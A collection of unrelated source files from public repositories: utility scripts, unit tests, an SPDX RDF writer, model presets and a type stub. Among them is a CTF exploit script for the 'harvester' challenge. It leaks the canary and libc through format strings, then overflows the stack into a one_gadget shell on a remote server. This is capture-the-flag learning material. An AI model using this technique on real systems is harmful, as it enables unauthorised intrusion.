| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
18_重复字符串重命名-counter.py
|
from collections import Counter
chars = input().split(",")
counter = Counter()
res = []
for char in chars:
if char in counter:
res.append(f"{char}_{counter[char] - 1}")
counter[char] += 1
else:
res.append(char)
counter[char] = 1
print(res)
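# Example (for illustration): the input "a,b,a,a" prints
# ['a', 'b', 'a_0', 'a_1'] -- the first occurrence keeps its name and later
# duplicates get a 0-based suffix.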
|
86e467b2314d0a54c542a3e19c3f4041499c5cb8
|
73bf31d04b9ad66a7649c7786cdbf50c06cf46e2
|
/tests/gen-installed-test.py
|
32887b5e24d7c11d7995805bf1af5c40e9fb0d64
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ebassi/graphene
|
b137ca6ab3faeca9f86a3c36284f5e49bad1e3ee
|
0cfa05ff62f244e4d5e7ac35a1979a23f25c5151
|
refs/heads/master
| 2023-09-01T01:38:46.767165
| 2023-08-10T14:47:59
| 2023-08-10T14:47:59
| 19,352,997
| 341
| 87
|
MIT
| 2023-08-19T23:22:24
| 2014-05-01T18:07:32
|
C
|
UTF-8
|
Python
| false
| false
| 2,027
|
py
|
gen-installed-test.py
|
#!/usr/bin/env python3
# Copyright 2017 Emmanuele Bassi
#
# SPDX-License-Identifier: MIT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import os
import argparse
def write_template(filename, data):
with open(filename, 'w') as f:
f.write(data)
def build_template(testdir, testname):
return """[Test]
Type=session
Exec={}
TestEnvironment=MUTEST_OUTPUT=tap;
""".format(os.path.join(testdir, testname))
argparser = argparse.ArgumentParser(description='Generate installed-test data.')
argparser.add_argument('--testdir', metavar='dir', required=True, help='Installed test directory')
argparser.add_argument('--testname', metavar='name', required=True, help='Installed test name')
argparser.add_argument('--outfile', metavar='file', required=True, help='Output file')
argparser.add_argument('--outdir', metavar='dir', required=True, help='Output directory')
args = argparser.parse_args()
write_template(os.path.join(args.outdir, args.outfile), build_template(args.testdir, args.testname))
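# Example invocation (paths and names here are illustrative only):
#   gen-installed-test.py --testdir /usr/libexec/installed-tests/graphene \
#       --testname api --outfile api.test --outdir build/tests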
|
3e9c11fe7bc740b612a354e31b707b41fb7ccf71
|
db732c7e4477c8e4dc725038d8712022c5bcf449
|
/test/test_postgress.py
|
d2c8ebbd6bb673e44cf7a80f948224460484ed3f
|
[
"MIT"
] |
permissive
|
macbre/sql-metadata
|
e30a177b5250ef0e9145b13246e1958f6914a98a
|
6507b8111b3c9d14414f3e42e7107e6558fa47c2
|
refs/heads/master
| 2023-08-18T00:22:20.118438
| 2023-08-07T02:10:12
| 2023-08-07T02:10:12
| 93,537,184
| 603
| 104
|
MIT
| 2023-09-13T07:15:43
| 2017-06-06T15:59:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
test_postgress.py
|
from sql_metadata import Parser
def test_postgress_quoted_names():
# https://github.com/macbre/sql-metadata/issues/85
parser = Parser(
'INSERT INTO "test" ("name") VALUES (\'foo\') RETURNING "test"."id"'
)
assert ["test"] == parser.tables
assert ["name"] == parser.columns
assert {"insert": ["name"]} == parser.columns_dict
assert "INSERT INTO test (name) VALUES (X) RETURNING test.id" == parser.generalize
assert parser.values == ["foo"]
parser = Parser(
'SELECT "test"."id", "test"."name" FROM "test" '
'WHERE "test"."name" = \'foo\' LIMIT 21 FOR UPDATE'
)
assert ["test"] == parser.tables
assert ["test.id", "test.name"] == parser.columns
assert {
"select": ["test.id", "test.name"],
"where": ["test.name"],
} == parser.columns_dict
assert (
"SELECT test.id, test.name FROM test WHERE test.name = X LIMIT N FOR UPDATE"
== parser.generalize
)
parser = Parser('UPDATE "test" SET "name" = \'bar\' WHERE "test"."id" = 1')
assert ["test"] == parser.tables
assert ["name", "test.id"] == parser.columns
assert {"update": ["name"], "where": ["test.id"]} == parser.columns_dict
assert "UPDATE test SET name = X WHERE test.id = N" == parser.generalize
|
0374a4b098efe0abd0f38086db514e3141fda7ce
|
c2c212ba42ebfa35f3b6122344978bc94ec8fa67
|
/tests/test_spendwithpennies.py
|
23d6e3b99019ecff2a4169d1e330badd28cfde71
|
[
"MIT"
] |
permissive
|
hhursev/recipe-scrapers
|
0cd6b7db4ef23ca825f2354f5d1ba76076a14813
|
8ced0227b3b16c532fc5ebf3060c99ee0452adab
|
refs/heads/main
| 2023-09-03T07:33:29.684121
| 2023-09-01T21:15:50
| 2023-09-01T21:15:50
| 42,446,168
| 1,276
| 443
|
MIT
| 2023-09-14T16:34:09
| 2015-09-14T12:05:00
|
Python
|
UTF-8
|
Python
| false
| false
| 2,383
|
py
|
test_spendwithpennies.py
|
from recipe_scrapers.spendwithpennies import SpendWithPennies
from tests import ScraperTest
class TestSpendWithPenniesScraper(ScraperTest):
scraper_class = SpendWithPennies
def test_host(self):
self.assertEqual("spendwithpennies.com", self.harvester_class.host())
def test_canonical_url(self):
self.assertEqual(
"https://www.spendwithpennies.com/gooey-chocolate-pudding-cake/",
self.harvester_class.canonical_url(),
)
def test_title(self):
self.assertEqual(self.harvester_class.title(), "Gooey Chocolate Pudding Cake")
def test_author(self):
self.assertEqual(self.harvester_class.author(), "Holly Nilsson")
def test_total_time(self):
self.assertEqual(35, self.harvester_class.total_time())
def test_yields(self):
self.assertEqual("6 servings", self.harvester_class.yields())
def test_image(self):
self.assertEqual(
"https://www.spendwithpennies.com/wp-content/uploads/2013/10/Chocolate-Pudding-Cake-SpendWithPennies-B-4.jpg",
self.harvester_class.image(),
)
def test_ingredients(self):
self.assertEqual(
[
"¾ cup all-purpose flour",
"½ cup sugar",
"½ cup unsweetened cocoa powder",
"1 ½ teaspoons baking powder",
"⅔ cup milk",
"2 tablespoons vegetable oil",
"1 teaspoon vanilla",
"⅔ cup brown sugar (packed)",
"¼ cup cocoa powder",
"¼ cup miniature semisweet chocolate chips",
"1 ¼ cups very hot water",
],
self.harvester_class.ingredients(),
)
def test_instructions(self):
self.assertEqual(
"Preheat oven to 350°F.\nIn a 2 qt casserole dish, combine flour, white sugar, cocoa powder, and baking powder.\nAdd milk and oil, and vanilla. Stir until well mixed.\nIn a small bowl, combine brown sugar, cocoa powder and chocolate chips. Sprinkle over cake batter. DO NOT STIR. Pour hot water over top.\nBake for 30-35 minutes or until the top looks cooked. Serve warm (with ice cream if desired).",
self.harvester_class.instructions(),
)
def test_ratings(self):
self.assertEqual(4.9, self.harvester_class.ratings())
|
08ffb8e22972f18ea55bcc7cbea89d7b6b3aec4b
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tools/mo/unit_tests/mo/front/common/partial_infer/utils_test.py
|
b6fc90204ac42ce710aaf3a2125ca27f8850d96d
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 9,007
|
py
|
utils_test.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from generator import generator, generate
from openvino.tools.mo.front.common.partial_infer.utils import int64_array, mo_array, is_fully_defined, \
dynamic_dimension_value, dynamic_dimension, shape_array, compatible_shapes, shape_delete, shape_insert, \
strict_compare_tensors, clarify_partial_shape
from openvino.tools.mo.utils.error import Error
def gen_masked_array(array, masked_indices):
"""
Creates a masked array from the input array by masking specific elements.
:param array: the input array
:param masked_indices: element indices to be masked
:return: the result masked array
"""
res = np.ma.masked_array(array)
for index in masked_indices:
res[index] = np.ma.masked
return res
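# For example (illustrative): gen_masked_array([1, 2, 3], [1]) produces the
# masked shape [1, --, 3], i.e. dimension 1 is treated as dynamic.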
@generator
class IsFullyDefinedTest(unittest.TestCase):
@generate(*[(None, False),
(int64_array([2, 3, 5, 7]), True), # int64 array with valid values
(np.array([2, 3, 5, 7]), True), # any numpy array with valid values
(np.array([2, dynamic_dimension_value]), True), # array with dynamic dimension value is fully defined!
(shape_array([2, dynamic_dimension_value, 5]), False), # masked array with at least one masked element
(shape_array([2, 4, 5]), True), # masked array with no masked elements is fully defined
(dynamic_dimension, False), # dynamic dimension is not fully defined
(dynamic_dimension_value, True), # dynamic dimension value is fully defined
((dynamic_dimension_value, dynamic_dimension_value), True), # list with dynamic dimension values is
# fully defined
((dynamic_dimension, 1), False), # tuple with dynamic dimension is not fully defined
([dynamic_dimension, 1], False), # list with dynamic dimension is not fully defined
])
def test_is_fully_defined(self, data, result):
self.assertEqual(is_fully_defined(data), result)
@generator
class ShapeArrayTest(unittest.TestCase):
@generate(*[([1], shape_array([1]), True),
# if we provide a list with dynamic_dimension_value then it is converted to dynamic dimension
([dynamic_dimension_value, 5], gen_masked_array([1, 5], [0]), True),
# if we provide a list with dynamic_dimension then the generated shape array still have it
([7, dynamic_dimension], gen_masked_array([7, 1], [1]), True),
# negative test to make sure that np.ma.allequal works properly
([2], gen_masked_array([1], []), False),
])
def test_shape_array(self, data, ref, result):
self.assertEqual(strict_compare_tensors(shape_array(data), ref), result)
@generator
class CompareShapesTest(unittest.TestCase):
@generate(*[(gen_masked_array([1, 2, 3], []), gen_masked_array([1, 2, 3], []), True),
(gen_masked_array([4, 2, 3], []), gen_masked_array([1, 2, 3], []), False),
(gen_masked_array([1, 2], []), gen_masked_array([1, 2, 3], []), False),
(gen_masked_array([1, 2, 3], []), gen_masked_array([1, 2], []), False),
(gen_masked_array([1, 2, 3], [1]), gen_masked_array([1, 5, 3], [1]), True), # [1, d, 3] vs [1, d, 3]
(gen_masked_array([1, 2, 3], [2]), gen_masked_array([1, 5, 3], [1]), True), # [1, 2, d] vs [1, d, 3]
(gen_masked_array([1, 2, 3], []), gen_masked_array([1, 5, 3], [1]), True), # [1, 2, 3] vs [1, d, 3]
(gen_masked_array([1, 2, 3], [0]), gen_masked_array([1, 5, 3], []), False), # [d, 2, 3] vs [1, 5, 3]
(np.array([1, 2, 3]), gen_masked_array([1, 5, 3], [1]), True), # [1, 2, 3] vs [1, d, 3]
(np.array([1, 2]), gen_masked_array([1, 5, 3], [1]), False),
(np.array([1, 2]), np.array([1, 2]), True),
(np.array([1, 2]), np.array([3, 2]), False),
])
def test_compare_shapes(self, input1, input2, result):
self.assertEqual(compatible_shapes(input1, input2), result)
@generator
class ShapeDeleteTest(unittest.TestCase):
@generate(*[(gen_masked_array([1, 2, 3], []), [], gen_masked_array([1, 2, 3], [])),
# [1, d, 3] -> [d, 3]. Indices input is a list
(gen_masked_array([1, 2, 3], [1]), [0], gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is a numpy array
(gen_masked_array([1, 2, 3], [1]), np.array([0]), gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is a masked array
(gen_masked_array([1, 2, 3], [1]), gen_masked_array([0], []), gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is a numpy array with scalar
(gen_masked_array([1, 2, 3], [1]), np.array(0), gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is an integer
(gen_masked_array([1, 2, 3], [1]), 0, gen_masked_array([2, 3], [0])), # [1, d, 3] -> [d, 3]
(gen_masked_array([1, 2, 3, 4], [1]), [0, 2], gen_masked_array([2, 4], [0])), # [1, d, 3, 4] -> [d, 4]
(gen_masked_array([1, 2, 3], [1]), [0, 2, 1], gen_masked_array([], [])), # [1, d, 3] -> []
(gen_masked_array([1, 2, 3], [1]), [0, 2], gen_masked_array([2], [0])), # [1, d, 3] -> [d]
# [1, d, d, 4] -> [d, d]
(gen_masked_array([1, 2, 3, 4], [1, 2]), [3, 0], gen_masked_array([2, 3], [0, 1])),
(gen_masked_array([1, 2, 3, 4], [2]), 3, gen_masked_array([1, 2, 3], [2])), # [1, 2, d, 4] -> [1, 2, d]
([1, 2, 3, 4], [1], [1, 3, 4]), # [1, 2, 3, 4] -> [1, 3, 4]. Input is a regular lists
(np.array([1, 2, 3, 4]), [1], [1, 3, 4]), # [1, 2, 3, 4] -> [1, 3, 4]. Input is a regular arrays
(np.array([1, 2, 3, 4]), [-1, -3], [1, 3]), # [1, 2, 3, 4] -> [1, 3]. Negative indices
(np.array([1, 2, 3, 4]), -2, [1, 2, 4]), # [1, 2, 3, 4] -> [1, 2, 4]. Negative index
])
def test_shape_delete(self, shape, indices, result):
self.assertTrue(strict_compare_tensors(shape_delete(shape, indices), result))
def test_shape_delete_raise_exception(self):
with self.assertRaisesRegex(Error, '.*Incorrect parameter type.*'):
shape_delete(gen_masked_array([1, 2, 3], []), {})
@generator
class ShapeInsertTest(unittest.TestCase):
@generate(*[(gen_masked_array([1, 2, 3], []), 1, [5], gen_masked_array([1, 5, 2, 3], [])),
(gen_masked_array([1, 2, 3], [1]), 1, [5], gen_masked_array([1, 5, 2, 3], [2])),
(gen_masked_array([1, 2, 3], [1]), 1, [dynamic_dimension], gen_masked_array([1, 5, 2, 3], [1, 2])),
(gen_masked_array([1, 2, 3], [1]), 0, [dynamic_dimension], gen_masked_array([5, 1, 2, 3], [0, 2])),
(gen_masked_array([1, 2, 3], [1]), np.int64(0), [dynamic_dimension],
gen_masked_array([5, 1, 2, 3], [0, 2])),
(gen_masked_array([1, 2, 3], [1]), 3, [dynamic_dimension], gen_masked_array([1, 2, 3, 5], [1, 3])),
(gen_masked_array([1, 2, 3], [1]), 3, [dynamic_dimension, dynamic_dimension],
gen_masked_array([1, 2, 3, 5, 6], [1, 3, 4])),
(gen_masked_array([1], [0]), 0, [7, dynamic_dimension], gen_masked_array([7, 5, 2], [1, 2])),
])
def test_shape_insert(self, shape, pos, values, result):
self.assertTrue(strict_compare_tensors(shape_insert(shape, pos, values), result))
def test_shape_insert_raise_exception(self):
with self.assertRaisesRegex(Error, '.*Incorrect parameter type.*'):
shape_insert(gen_masked_array([1, 2, 3], []), 2, {})
@generator
class mo_array_test(unittest.TestCase):
@generate(*[(mo_array([2, 3, 5, 7]), np.array([2, 3, 5, 7])),
(mo_array([2., 3., 5., 7.], dtype=np.float64), np.array([2., 3., 5., 7.])),
(mo_array([2., 3., 5., 7.]), np.array([2., 3., 5., 7.], dtype=np.float32)),
])
def test_mo_array_positive(self, data, result):
self.assertEqual(data.dtype, result.dtype)
@generate(*[(mo_array([2., 3., 5., 7.]), np.array([2., 3., 5., 7.])),
])
def test_mo_array_negative(self, data, result):
self.assertNotEqual(data.dtype, result.dtype)
class clarify_partial_shape_test(unittest.TestCase):
def test_clarify_1(self):
actual_result = clarify_partial_shape([shape_array([dynamic_dimension, 10, dynamic_dimension]),
shape_array([4, dynamic_dimension, dynamic_dimension])])
ref_result = shape_array([4, 10, dynamic_dimension])
assert strict_compare_tensors(actual_result, ref_result)
|
f8f55732146f845ddb672eec0603ac04fe0ad799
|
bfc42c114f652012b6cfd14e7cccf52cb6b9ac7e
|
/src/spdx_tools/spdx/writer/rdf/package_writer.py
|
2137d0dbd286b1b788a41716766df24469facd57
|
[
"Apache-2.0",
"GPL-2.0-only"
] |
permissive
|
spdx/tools-python
|
05a952501af2ac608678cb1737f7c661f6091fa2
|
777bd274dd06cb24342738df7da5ab285d652350
|
refs/heads/main
| 2023-08-31T09:39:52.930063
| 2023-08-24T06:39:48
| 2023-08-24T10:22:33
| 32,761,058
| 147
| 136
|
Apache-2.0
| 2023-09-14T15:50:59
| 2015-03-23T21:54:39
|
Python
|
UTF-8
|
Python
| false
| false
| 6,545
|
py
|
package_writer.py
|
# SPDX-FileCopyrightText: 2023 spdx contributors
#
# SPDX-License-Identifier: Apache-2.0
from beartype.typing import Dict
from rdflib import DOAP, RDF, RDFS, XSD, BNode, Graph, Literal, URIRef
from spdx_tools.spdx.casing_tools import snake_case_to_camel_case
from spdx_tools.spdx.model import ExternalPackageRef, Package, PackageVerificationCode
from spdx_tools.spdx.model.package import CATEGORY_TO_EXTERNAL_PACKAGE_REF_TYPES
from spdx_tools.spdx.rdfschema.namespace import REFERENCE_NAMESPACE, SPDX_NAMESPACE
from spdx_tools.spdx.writer.rdf.checksum_writer import add_checksum_to_graph
from spdx_tools.spdx.writer.rdf.license_expression_writer import add_license_expression_or_none_or_no_assertion
from spdx_tools.spdx.writer.rdf.writer_utils import (
add_datetime_to_graph,
add_literal_or_no_assertion_or_none,
add_namespace_to_spdx_id,
add_optional_literal,
)
def add_package_to_graph(
package: Package, graph: Graph, doc_namespace: str, external_doc_ref_to_namespace: Dict[str, str]
):
package_resource = URIRef(add_namespace_to_spdx_id(package.spdx_id, doc_namespace, external_doc_ref_to_namespace))
graph.add((package_resource, RDF.type, SPDX_NAMESPACE.Package))
graph.add((package_resource, SPDX_NAMESPACE.name, Literal(package.name)))
add_optional_literal(package.version, graph, package_resource, SPDX_NAMESPACE.versionInfo)
add_optional_literal(package.file_name, graph, package_resource, SPDX_NAMESPACE.packageFileName)
add_optional_literal(package.supplier, graph, package_resource, SPDX_NAMESPACE.supplier)
add_optional_literal(package.originator, graph, package_resource, SPDX_NAMESPACE.originator)
add_literal_or_no_assertion_or_none(
package.download_location, graph, package_resource, SPDX_NAMESPACE.downloadLocation
)
graph.add((package_resource, SPDX_NAMESPACE.filesAnalyzed, Literal(package.files_analyzed, datatype=XSD.boolean)))
add_package_verification_code_to_graph(package.verification_code, graph, package_resource)
for checksum in package.checksums:
add_checksum_to_graph(checksum, graph, package_resource)
add_optional_literal(package.homepage, graph, package_resource, DOAP.homepage)
add_optional_literal(package.source_info, graph, package_resource, SPDX_NAMESPACE.sourceInfo)
add_license_expression_or_none_or_no_assertion(
package.license_concluded, graph, package_resource, SPDX_NAMESPACE.licenseConcluded, doc_namespace
)
add_license_expression_or_none_or_no_assertion(
package.license_info_from_files, graph, package_resource, SPDX_NAMESPACE.licenseInfoFromFiles, doc_namespace
)
add_license_expression_or_none_or_no_assertion(
package.license_declared, graph, package_resource, SPDX_NAMESPACE.licenseDeclared, doc_namespace
)
add_optional_literal(package.license_comment, graph, package_resource, SPDX_NAMESPACE.licenseComments)
add_optional_literal(package.copyright_text, graph, package_resource, SPDX_NAMESPACE.copyrightText)
add_optional_literal(package.summary, graph, package_resource, SPDX_NAMESPACE.summary)
add_optional_literal(package.description, graph, package_resource, SPDX_NAMESPACE.description)
add_optional_literal(package.comment, graph, package_resource, RDFS.comment)
for external_reference in package.external_references:
add_external_package_ref_to_graph(external_reference, graph, package_resource, doc_namespace)
for attribution_text in package.attribution_texts:
add_optional_literal(attribution_text, graph, package_resource, SPDX_NAMESPACE.attributionText)
if package.primary_package_purpose:
graph.add(
(
package_resource,
SPDX_NAMESPACE.primaryPackagePurpose,
SPDX_NAMESPACE[f"purpose_{snake_case_to_camel_case(package.primary_package_purpose.name)}"],
)
)
add_datetime_to_graph(package.release_date, graph, package_resource, SPDX_NAMESPACE.releaseDate)
add_datetime_to_graph(package.built_date, graph, package_resource, SPDX_NAMESPACE.builtDate)
add_datetime_to_graph(package.valid_until_date, graph, package_resource, SPDX_NAMESPACE.validUntilDate)
def add_package_verification_code_to_graph(
package_verification_code: PackageVerificationCode, graph: Graph, package_node: URIRef
):
if not package_verification_code:
return
package_verification_code_node = BNode()
graph.add((package_verification_code_node, RDF.type, SPDX_NAMESPACE.PackageVerificationCode))
graph.add(
(
package_verification_code_node,
SPDX_NAMESPACE.packageVerificationCodeValue,
Literal(package_verification_code.value),
)
)
for excluded_file in package_verification_code.excluded_files:
graph.add(
(
package_verification_code_node,
SPDX_NAMESPACE.packageVerificationCodeExcludedFile,
Literal(excluded_file),
)
)
graph.add((package_node, SPDX_NAMESPACE.packageVerificationCode, package_verification_code_node))
def add_external_package_ref_to_graph(
external_package_ref: ExternalPackageRef, graph: Graph, package_node: URIRef, doc_namespace: str
):
external_package_ref_node = BNode()
graph.add((external_package_ref_node, RDF.type, SPDX_NAMESPACE.ExternalRef))
graph.add(
(
external_package_ref_node,
SPDX_NAMESPACE.referenceCategory,
SPDX_NAMESPACE[f"referenceCategory_{snake_case_to_camel_case(external_package_ref.category.name)}"],
)
)
if external_package_ref.reference_type in CATEGORY_TO_EXTERNAL_PACKAGE_REF_TYPES[external_package_ref.category]:
graph.add(
(
external_package_ref_node,
SPDX_NAMESPACE.referenceType,
REFERENCE_NAMESPACE[external_package_ref.reference_type],
)
)
else:
graph.add(
(
external_package_ref_node,
SPDX_NAMESPACE.referenceType,
URIRef(f"{doc_namespace}#{external_package_ref.reference_type}"),
)
)
graph.add((external_package_ref_node, SPDX_NAMESPACE.referenceLocator, Literal(external_package_ref.locator)))
if external_package_ref.comment:
graph.add((external_package_ref_node, RDFS.comment, Literal(external_package_ref.comment)))
graph.add((package_node, SPDX_NAMESPACE.externalRef, external_package_ref_node))
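# Hedged usage sketch (not part of the original module): serialize a single
# package to RDF/XML with the writer above. The Package constructor keywords
# are assumptions about the spdx_tools dataclass and may differ by version.
if __name__ == "__main__":
    example_graph = Graph()
    example_package = Package(
        spdx_id="SPDXRef-Package",
        name="example-pkg",
        download_location="https://example.com/example-pkg.tar.gz",
    )
    # No external document references in this sketch, hence the empty dict.
    add_package_to_graph(example_package, example_graph, "https://example.com/spdxdoc", {})
    print(example_graph.serialize(format="xml"))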
|
687cf1f0caea68ccd69a53deb299a9f2b19997d2
|
71fb04f723b46a1bf45295be239bcec25e07f98c
|
/keras_cv/models/object_detection/yolo_v8/yolo_v8_detector_presets.py
|
dfbbe512c102b388420e62aacb7edd52b0399b0a
|
[
"Apache-2.0"
] |
permissive
|
keras-team/keras-cv
|
9bca4479474e853ec3a1c541b8be20fea2447a1a
|
e83f229f1b7b847cd712d5cd4810097d3e06d14e
|
refs/heads/master
| 2023-08-31T10:22:08.406394
| 2023-08-30T20:24:57
| 2023-08-30T20:24:57
| 265,079,853
| 818
| 287
|
NOASSERTION
| 2023-09-12T16:49:01
| 2020-05-18T22:39:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,598
|
py
|
yolo_v8_detector_presets.py
|
# Copyright 2023 The KerasCV Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""YOLOv8 Task presets."""
from keras_cv.models.object_detection.yolo_v8 import yolo_v8_backbone_presets
yolo_v8_detector_presets = {
"yolo_v8_m_pascalvoc": {
"metadata": {
"description": (
"YOLOV8-M pretrained on PascalVOC 2012 object detection task, "
"which consists of 20 classes. This model achieves a final MaP "
"of 0.45 on the evaluation set."
),
"params": 25901004,
"official_name": "YOLOV8Detector",
"path": "yolo_v8_detector",
},
"config": {
"backbone": yolo_v8_backbone_presets.backbone_presets[
"yolo_v8_m_backbone"
],
"num_classes": 20,
"fpn_depth": 2,
},
"weights_url": "https://storage.googleapis.com/keras-cv/models/yolov8/pascal_voc/yolov8_m_v1.h5", # noqa: E501
"weights_hash": "2891fbd66f71e0b9da0cb02ef3afbccb819e1b8f18204157f643f4ec058a71a8", # noqa: E501
},
}
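# Hedged usage sketch (not part of the original presets file): KerasCV task
# models resolve entries in dictionaries like the one above through their
# `from_preset` constructor; the import below is done lazily to avoid a
# circular import at module load time, and the exact API may vary by version.
if __name__ == "__main__":
    from keras_cv.models import YOLOV8Detector

    # Downloads the pretrained PascalVOC weights referenced by "weights_url"
    # and builds the matching backbone and detection head.
    model = YOLOV8Detector.from_preset("yolo_v8_m_pascalvoc")
    model.summary()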
|
51de2408a1baff1a47719579366ccd169a70f12e
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stdlib/asyncio/base_tasks.pyi
|
42e952ffacaf0e6b7b52d0f1664c6e44f6fc10ce
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 404
|
pyi
|
base_tasks.pyi
|
from _typeshed import StrOrBytesPath
from types import FrameType
from typing import Any
from . import tasks
def _task_repr_info(task: tasks.Task[Any]) -> list[str]: ... # undocumented
def _task_get_stack(task: tasks.Task[Any], limit: int | None) -> list[FrameType]: ... # undocumented
def _task_print_stack(task: tasks.Task[Any], limit: int | None, file: StrOrBytesPath) -> None: ... # undocumented
|
76e768bbb618d3c9c6e6fb00dcc5f3d33955fdde
|
24db6985a016c3e4767c95ca51190e659d0847cd
|
/cyberapocalypsectf2021/harvester/exploit2.py
|
f8b4a1f3d7dae7216b0e18cc9c46d0297c23bb3d
|
[
"MIT"
] |
permissive
|
datajerk/ctf-write-ups
|
463f53db224410a51df481b9e41b7777a09f3e2c
|
c33815911de3f4a66cbafbf5f12d7b57239250d9
|
refs/heads/master
| 2022-09-30T02:29:44.097435
| 2022-09-05T02:16:19
| 2022-09-05T02:16:19
| 204,361,251
| 136
| 36
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,091
|
py
|
exploit2.py
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./harvester_no_usleep')
p = remote('46.101.22.121',31051)
libc = ELF('./libc.so.6')
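# Candidate one_gadget offsets (execve("/bin/sh") gadgets) for this libc
# build, presumably recovered with the one_gadget tool; the first candidate
# is selected below -- swap the index if its register constraints are not met.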
libc.symbols['gadget'] = [0x4f3d5, 0x4f432, 0x10a41c][0]
__libc_start_main_offset = 231
# get canary @11
p.sendlineafter('> ','1')
p.sendlineafter('> ','%11$p')
p.recvuntil('is: ')
canary = int(p.recvuntil('\x1b[1;').strip(b'\x1b[1;').decode(),16)
log.info('canary: ' + hex(canary))
# get libc @21
p.sendlineafter('> ','1')
p.sendlineafter('> ','%21$p')
p.recvuntil('is: ')
__libc_start_main = int(p.recvuntil('\x1b[1;').strip(b'\x1b[1;').decode(),16) - __libc_start_main_offset
log.info('__libc_start_main: ' + hex(__libc_start_main))
libc.address = __libc_start_main - libc.sym.__libc_start_main
log.info('libc.address: ' + hex(libc.address))
# get 21 pies
p.sendlineafter('> ','2')
p.sendlineafter('> ','y')
p.sendlineafter('> ','-11')
# stare
p.sendlineafter('> ','3')
payload = b''
payload += 40 * b'A'
payload += p64(canary)
payload += 8 * b'B'
payload += p64(libc.sym.gadget)
p.sendafter('> ',payload)
p.interactive()
|
d40b8598a73d340dd88b386137a875123a5aa0b0
|
d46db5fee8953104609ac005085040ed344ec876
|
/tobler/model/glm.py
|
8f929ce59f6cf73701df6df4d6a79de5f7b9b938
|
[
"BSD-3-Clause"
] |
permissive
|
pysal/tobler
|
0ebaf4b6d50a89f29df23d78d09e4c56b93546b3
|
ce6fcb900b4290cd7bbec99236dd40a1baa98f0b
|
refs/heads/main
| 2023-09-01T21:19:19.913555
| 2023-08-22T16:09:53
| 2023-08-22T16:09:53
| 202,220,824
| 127
| 24
|
BSD-3-Clause
| 2023-09-11T16:05:34
| 2019-08-13T20:41:42
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,742
|
py
|
glm.py
|
"""Model-based methods for areal interpolation."""
import statsmodels.formula.api as smf
from statsmodels.genmod.families import Gaussian, NegativeBinomial, Poisson
from ..util.util import _check_presence_of_crs
from ..dasymetric import _fast_append_profile_in_gdf
import numpy as np
def glm(
source_df=None,
target_df=None,
raster="nlcd_2011",
raster_codes=None,
variable=None,
formula=None,
likelihood="poisson",
force_crs_match=True,
return_model=False,
):
"""Train a generalized linear model to predict polygon attributes based on the collection of pixel values they contain.
Parameters
----------
source_df : geopandas.GeoDataFrame, required
geodataframe containing source original data to be represented by another geometry
target_df : geopandas.GeoDataFrame, required
geodataframe containing target boundaries that will be used to represent the source data
raster : str, required (default="nlcd_2011")
        path to raster file that will be used to input data to the regression model,
        i.e. coefficients refer to the relationship between pixel counts and population counts.
Defaults to 2011 NLCD
    raster_codes : list, required (default=[21, 22, 23, 24, 41, 42, 52])
list of integers that represent different types of raster cells. If no formula is given,
the model will be fit from a linear combination of the logged count of each cell type
listed here. Defaults to [21, 22, 23, 24, 41, 42, 52] which
are informative land type cells from the NLCD
variable : str, required
name of the variable (column) to be modeled from the `source_df`
formula : str, optional
